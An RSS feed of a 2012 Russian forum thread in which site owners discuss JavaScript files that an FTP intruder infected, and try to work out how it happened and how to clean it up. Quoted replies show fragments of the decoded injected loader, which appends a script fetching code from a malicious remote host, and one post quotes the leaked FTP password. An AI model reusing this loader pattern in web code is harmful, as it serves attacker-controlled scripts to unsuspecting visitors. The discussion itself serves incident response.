<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Чего хотел взломщик?</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html</link>
    <description>Ubuntu server 9.10 + vsftpd 2.2.0-1&lt;br&gt;&lt;br&gt;Сегодня утром просматривая отчёты logwatch, заметил что кто-то, каким-то образом подобрал пароль на наш ftp (пароль был f2t3p4!) и заменил все .js файлы на свои.&lt;br&gt;&lt;br&gt;.js файлы лежали в то числе в Driver Pack Solution.&lt;br&gt;&lt;br&gt;Оригинальный файл DRPSu12&#092;tools&#092;modules&#092;resize.js&lt;br&gt;----------------------------------------------------------------&lt;br&gt;// On change size of the window&lt;br&gt;try &#123;&lt;br&gt;self.resizeTo(width,height - 25);&lt;br&gt;self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));&lt;br&gt;//if (screen.width==640)&#123;&lt;br&gt;if ((screen.width&amp;lt;width)&amp;#124;&amp;#124;(screen.height&amp;lt;height))&#123;&lt;br&gt;self.resizeTo(800,600 - 25);&lt;br&gt;self.moveTo(0,0);&lt;br&gt;window.attachEvent(&apos;onload&apos;,function()&#123;tooglePanel();&#125;);&lt;br&gt;&#125;&lt;br&gt;//if (screen.height&amp;lt;height)&#123; //On netbooks&lt;br&gt;//window.attachEvent(&apos;onload&apos;,function()&#123;&lt;br&gt;//self.resizeTo(width,$(window).height() - 25);&lt;br&gt;//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;&lt;br&gt;//var callHeight = (screen.height / 2) - (($(window).height()+80) /</description>

<item>
    <title>Чего хотел взломщик? (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#11</link>
    <pubDate>Thu, 17 May 2012 00:37:23 GMT</pubDate>
    <description>&amp;gt; Числит сайт от этой хрени (кстати, появилась она с месяц назад, и &lt;br&gt;&amp;gt; вирусы её не ловили и пропускали как нормальный код) - все &lt;br&gt;&amp;gt; js перезаписала в конец. Код динамический в середине - начало и &lt;br&gt;&amp;gt; конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о &lt;br&gt;&amp;gt; вирусах на сайте вручную слил весь сайт и ручками поудалял этот &lt;br&gt;&amp;gt; код. Собственно, к чему это все :) Проблема не один раз &lt;br&gt;&amp;gt; почистить - а понять, как он туда попадает и предотвратить. Доступа &lt;br&gt;&amp;gt; прямого ни у кого нет, пароль отдельно от FTP клиента хранится? &lt;br&gt;&lt;br&gt;нужно смотреть на дату изменения файлов (тут вы уже пролетели, конечно) и в логи (http, ftp) в которых искать, что было во в то время, когда менялись файлы.&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (Alex)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#10</link>
    <pubDate>Wed, 16 May 2012 16:39:34 GMT</pubDate>
    <description>Числит сайт от этой хрени (кстати, появилась она с месяц назад, и вирусы её не ловили и пропускали как нормальный код) - все js перезаписала в конец. Код динамический в середине - начало и конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о вирусах на сайте вручную слил весь сайт и ручками поудалял этот код. Собственно, к чему это все :) Проблема не один раз почистить - а понять, как он туда попадает и предотвратить. Доступа прямого ни у кого нет, пароль отдельно от FTP клиента хранится?&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (ck80)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#9</link>
    <pubDate>Mon, 16 Apr 2012 08:42:51 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt; на официальном сайте FIRE ZILLA в данный момент нет никаких наводок &lt;br&gt;&amp;gt; на этот сервис, да и вообще о портатиыной версии ВООБЩЕ!&lt;br&gt;&amp;gt; после этого удалил ее нахер и скачал с ОпенФортча по ссылке с &lt;br&gt;&amp;gt; офсайта FIRE ZILLA!&lt;br&gt;&amp;gt; давайте копать наконец то!&lt;br&gt;&amp;gt; загвостка гдето на носу!&lt;br&gt;&amp;gt; и кстати той утилитой по удалению подобного кода невозможно удалить динамический код. &lt;br&gt;&amp;gt; а у меня этот вирус сделал динамику в содержимом, ява скриптов у &lt;br&gt;&amp;gt; меня около 100 шт на сервере, мне пришлось потратить более часа &lt;br&gt;&amp;gt; на его чистку((((( &lt;br&gt;&lt;br&gt;У меня фтп не на хостинге, а на корпораитвном сервере.&lt;br&gt;На сервере стоит fail2ban, denyhost. Попыток подбора паролей не было. Судя по логам был сразу вход. ФТПшником пользуются несколько сотрудников. Я подозреваю, что кто-то из них заразился вирусом и вирус вытащил сохранённые пароли от ФТП&lt;br&gt;&lt;br&gt;В логах сохранился IP взломщика: 50.115.122.28&lt;br&gt;Написал abuse по хуизу, ответили:&lt;br&gt;&lt;br&gt;==========================================================&lt;br&gt;abuse&#064;midphase.com &lt;br&gt;Hello,&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (freepaint)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#8</link>
    <pubDate>Sun, 15 Apr 2012 18:30:13 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt; время (дата обновления файлов на каждом сайте отличается всего на 1-2 &lt;br&gt;&amp;gt; мин), а вот на втором хостинге раньше на 1 день. Получается, &lt;br&gt;&amp;gt; что заражали сразу целыми хостингами.&lt;br&gt;&amp;gt; Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной &lt;br&gt;&amp;gt; копии на локальном комьютере, но вот заражение мне кажется было не &lt;br&gt;&amp;gt; через FTP сайта, а непосредственно на сервере провайдера.&lt;br&gt;&amp;gt; Кстати вот здесь есть скрипт, который вроде как лечит данную проблему: &lt;br&gt;&amp;gt; https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d2a1f6b82ceb9 &lt;br&gt;&amp;gt; (сам я его не запускал, обновил всё через верезрвную копию, но возможно &lt;br&gt;&amp;gt; кому-то пригодиться.) &lt;br&gt;&lt;br&gt;ПОЧЕМУ вы не постучались? (совершенно случайно второй раз попал на этот сайт из за вашего неответа! чуть не потерял с вами контакт) давайте решим эту проблему. ею все больше и большн заражаются разработчики и не знают в чем дело, т.к коды разные, но схема одна!!! все даты идут на 12 число!!! хотя софт и сервер у мене не менялись годами!</description>
</item>

<item>
    <title>Чего хотел взломщик? (Alex)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#7</link>
    <pubDate>Sat, 14 Apr 2012 19:04:59 GMT</pubDate>
    <description>Ваш хостинг точно тут не причем, потому, что у меня заразились аналогичным вирусом сразу 5 разных сайтов. при этом они расположены на 2 разных хостингах.&lt;br&gt;Заражение всех сайтов на одном хостинге произошло примерно в одно и тоже время (дата обновления файлов на каждом сайте отличается всего на 1-2 мин), а вот на втором хостинге раньше на 1 день. Получается, что заражали сразу целыми хостингами.&lt;br&gt;&lt;br&gt;Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной копии на локальном комьютере, но вот заражение мне кажется было не через FTP сайта, а непосредственно на сервере провайдера. &lt;br&gt;Кстати вот здесь есть скрипт, который вроде как лечит данную проблему:&lt;br&gt;https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d2a1f6b82ceb9&lt;br&gt;(сам я его не запускал, обновил всё через верезрвную копию, но возможно кому-то пригодиться.)&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (freepaint)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#6</link>
    <pubDate>Fri, 13 Apr 2012 21:30:04 GMT</pubDate>
    <description>ЗДРАВСТВУЙТЕ!&lt;br&gt;СРОЧНО ОБЪЕДЕНЯЕМСЯ!!!&lt;br&gt;у меня тоже в ява кодах точно такой код на сайте&lt;br&gt;заметил примерно в то же время 12-13 апреля 2012 года.&lt;br&gt;давайте копать!!! &lt;br&gt;&lt;br&gt;ВОТ МОИ КОНТАКТЫ: &lt;br&gt;IСИQ:   55-99-8-ноль&lt;br&gt;e_mail: freepainte(собчак)yandex.ru&lt;br&gt;&lt;br&gt;Доступ ftp никому не довал&lt;br&gt;Хостинг: IHC.ru (намек на него)&lt;br&gt;&lt;br&gt;Если узнаем кто это делает, то попробуем потрясти его хорошенько!&lt;br&gt;Прикинь, если это хостинг! )) вот мы его на бабки раскрутим!&lt;br&gt;&lt;br&gt;в общем давай копать. жду!&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (Andrey Mitrofanov)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#5</link>
    <pubDate>Fri, 13 Apr 2012 12:46:23 GMT</pubDate>
    <description>чем-чем, заменил e() в конце каким ни то print-ом.&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (Алексей)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#4</link>
    <pubDate>Fri, 13 Apr 2012 12:41:19 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt;     &#125; &lt;br&gt;&amp;gt;    &#125;; &lt;br&gt;&amp;gt;    script.onload = function() &#123; &lt;br&gt;&amp;gt;     window.xyzflag = 2; &lt;br&gt;&amp;gt;    &#125;; &lt;br&gt;&amp;gt;    script.src = url + Math.random().toString().substring(3) + &apos;.js&apos;; &lt;br&gt;&amp;gt;    head.appendChild(script); &lt;br&gt;&amp;gt;   &#125; &lt;br&gt;&amp;gt;  &#125;; &lt;br&gt;&amp;gt; &#125;)(); &lt;br&gt;&lt;br&gt;Чем, если не секрет раскрыли бинарник?&lt;br&gt;</description>
</item>

<item>
    <title>Чего хотел взломщик? (user)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#3</link>
    <pubDate>Thu, 12 Apr 2012 11:32:26 GMT</pubDate>
    <description>&amp;gt;&amp;gt;&amp;gt; Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение &lt;br&gt;&amp;gt;&amp;gt;&amp;gt; какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста, &lt;br&gt;&amp;gt;&amp;gt;&amp;gt; кто может?&lt;br&gt;&amp;gt;&amp;gt; Вот что: &lt;br&gt;&amp;gt;&amp;gt; (function() &#123; &lt;br&gt;&amp;gt;&amp;gt;  var url = &apos;http://6ywcxns.vugrtrilro.selfip.com/g/&apos;; &lt;br&gt;&amp;gt;&amp;gt;  if (typeof window.xyzflag === &apos;undefined&apos;) &#123; &lt;br&gt;&amp;gt; Спасибо, ещё больше ничего не понятно.  :) &lt;br&gt;&lt;br&gt;Че не понятно то? В страничку внедряется нечто скачиваемое с http://6ywcxns.vugrtrilro.selfip.com/g&lt;br&gt;</description>
</item>

</channel>
</rss>
